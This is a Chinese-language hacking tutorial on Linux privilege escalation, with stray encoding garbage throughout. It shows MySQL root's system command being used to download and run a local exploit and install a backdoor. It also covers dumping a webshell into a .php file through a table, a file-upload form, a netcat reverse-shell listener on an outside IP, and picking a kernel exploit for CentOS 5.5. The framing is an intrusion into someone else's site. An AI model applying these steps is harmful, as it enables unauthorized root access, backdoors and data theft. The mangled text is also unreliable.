利用mysql root提權(quán)方法
mysql 5.x里面引入了一個(gè)system函數(shù),這個(gè)函數(shù)可以執(zhí)行系統(tǒng)命令����,當(dāng)mysql以root登陸的時(shí)候�����,就可以利用這個(gè)函數(shù)執(zhí)行命令���,當(dāng)然是在權(quán)限許可的 范圍內(nèi)。
一般我們按照常規(guī)思路��,搞到mysql的root密碼之后��,我們都會(huì)連接上去,創(chuàng)建一個(gè)表��,然后outfile�,搞到一個(gè)webshell ,然后提權(quán)如斯這般。今天我們換一種方式�����。
按照上面的方法�,我們需要知道web的絕對(duì)路徑�����,當(dāng)然這個(gè)很不好找���,有些有sqlinjection的�,可能報(bào)錯(cuò)會(huì)顯示出來(lái)�����,有的就不一定了����。但是 按照我的的方法�,沒(méi)有必要再去找web路徑了����,直接執(zhí)行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接這樣就可以找到web的路徑,當(dāng)然����,我們的目的并不是找web路徑,放webshell進(jìn)去�。我們是要來(lái)做其他的事情,好比�����,下載exp執(zhí)行���, 搞到 root權(quán)限�,然后裝后門(mén)
mysql>system wget ;
mysql>system chmod +x xxxx; mysql>system ./xxxx;
這樣mysql的root此時(shí)就成為system的root了���,剩下的事情�����,假如開(kāi)了ssh,就ssh連接上去�,輸入mysql的用戶(hù)密碼,ok,搞 定����。
Linux低權(quán)限提權(quán)
反彈試試 tmp里創(chuàng)建好文件,SHELL目錄傳馬�����,執(zhí)行�,本地NC監(jiān)聽(tīng)上線(xiàn),WHOAMI一下�,是WWWROOT權(quán)限
查看版本
可以CD到根目錄上級(jí)(/var/www/virtual/),再LS一下����,全盤(pán)網(wǎng)站都出來(lái)了��,目標(biāo)站也沒(méi)瞎起文件夾名����,但是沒(méi)權(quán)限跳不進(jìn)去
試著TAR打包,沒(méi)權(quán)限��,試著單獨(dú)打包目標(biāo)站目錄文件�����,可以,但是根目錄CONN.CONFIG被限制當(dāng)前目標(biāo)站可讀權(quán)限����。
嘗試CP目標(biāo)站include目錄,竟然可以復(fù)制過(guò)來(lái)�,但是不可寫(xiě)復(fù)制不過(guò)去,找到了數(shù)據(jù)庫(kù)配置信息����,再另外服務(wù)器上。
先把數(shù)據(jù)庫(kù)用phpspyshell備份過(guò)來(lái):
查看到一些配置信息跟賬號(hào)�����,但是沒(méi)有后臺(tái)路徑等敏感信息
掃描工具掃不到目標(biāo)網(wǎng)站文件夾����,估計(jì)修改過(guò)了
試著提權(quán)CMDSHELL為USER或者ROOT,沒(méi)有直接去看Apache的配置設(shè)置,試著WGET幾個(gè)EXP,但是都沒(méi)用��,估計(jì)打過(guò)補(bǔ)丁
CP雖然可以���,但是不知道具體的信息
既然WEB沒(méi)權(quán)限��,就試著MYSQL看看有沒(méi)有權(quán)限吧
直接
CREATE TABLE hackdn (spider BLOB);創(chuàng)建表hackdn
插一句話(huà)
保存
然后備份成目標(biāo)路徑1.php文件���。發(fā)現(xiàn)連接不了���。
CP過(guò)來(lái)一看,被反譯符分隔了����,
不加 ‘ 的話(huà),就插入
再備份為PHP后����,本地保存以下代碼為
代碼如下
復(fù)制代碼
1.HTML
<form ENCTYPE=”multipart/form-data” ACTION=”” METHOD=”POST”>
<input NAME=”MyFile” TYPE=”file”>
<input VALUE=” 提交 ” TYPE=”submit”>
</form>
簡(jiǎn)單的linux提權(quán)
拿到shell了,準(zhǔn)備提權(quán).先看下linux內(nèi)核
uname -a
2.6.18-194.11.3.el5 內(nèi)核 2010的,這個(gè)好CentOS release 5.5好提
然后百度或者其它路徑找EXP,2.6.18-194這個(gè)內(nèi)核我已經(jīng)收藏過(guò).上傳到/tmp,為什么要傳到這個(gè)目錄呢?
因?yàn)閠mp目錄可寫(xiě)可執(zhí)行一般,繼續(xù)ing.
找個(gè)外網(wǎng)IP 監(jiān)聽(tīng)12666,當(dāng)然12666也可以改。我這里用NC監(jiān)聽(tīng)nc -l -n -v -p 12666
然后再點(diǎn)你shell
連接成功就出現(xiàn)下面的內(nèi)容
然后我們進(jìn)到/tmp目錄
